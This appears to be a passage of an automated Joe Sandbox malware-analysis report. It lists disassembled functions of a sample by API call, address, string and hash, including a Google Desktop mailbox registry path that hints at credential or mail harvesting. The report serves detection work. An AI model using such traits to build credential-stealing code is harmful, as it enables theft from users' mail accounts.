                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Close$EnumOpenmemset
                                                                                                                                                                                                                                    • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                                                                                                    • API String ID: 2255314230-2212045309
                                                                                                                                                                                                                                    • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                                                                                                                                    • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C28C
                                                                                                                                                                                                                                    • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                                                                                                                                      • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FocusMessagePostmemset
                                                                                                                                                                                                                                    • String ID: S_@$l
                                                                                                                                                                                                                                    • API String ID: 3436799508-4018740455
                                                                                                                                                                                                                                    • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                                                                                                                                    • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _mbscpy
                                                                                                                                                                                                                                    • String ID: C^@$X$ini
                                                                                                                                                                                                                                    • API String ID: 714388716-917056472
                                                                                                                                                                                                                                    • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                                                                    • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                                                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                                                                                                    • API String ID: 3492281209-168460110
                                                                                                                                                                                                                                    • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                                                                                                                                    • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ClassName_strcmpimemset
                                                                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                                                                    • API String ID: 275601554-2167791130
                                                                                                                                                                                                                                    • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                                                                                                                                    • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: strlen$_mbscat
                                                                                                                                                                                                                                    • String ID: 3CD
                                                                                                                                                                                                                                    • API String ID: 3951308622-1938365332
                                                                                                                                                                                                                                    • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                                                                                                                                    • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                    • String ID: rows deleted
                                                                                                                                                                                                                                    • API String ID: 2221118986-571615504
                                                                                                                                                                                                                                    • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                                                                    • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                                                                    • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                                                                                                                                    • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                                                                    • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                                                                    • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                                                                    • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                                                                    • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                                                                                                    • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                                    • API String ID: 2221118986-515162456
                                                                                                                                                                                                                                    • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                                                                    • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004026AD
                                                                                                                                                                                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                                                                      • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                                                                      • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3503910906-0
                                                                                                                                                                                                                                    • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                                                                    • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C922
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                                                                                                                                    • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                                                                                                                                    • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3798638045-0
                                                                                                                                                                                                                                    • Opcode ID: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                                                                                                                                                                    • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                                                                                                                                                                      • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                                                                                                    • atoi.MSVCRT(?,00000000,?,75C50A60,?,00000000), ref: 0040B619
                                                                                                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4107816708-0
                                                                                                                                                                                                                                    • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                                                                                                                                    • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: strlen
                                                                                                                                                                                                                                    • String ID: >$>$>
                                                                                                                                                                                                                                    • API String ID: 39653677-3911187716
                                                                                                                                                                                                                                    • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                                                                                                                                    • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                                    • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                                                                    • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
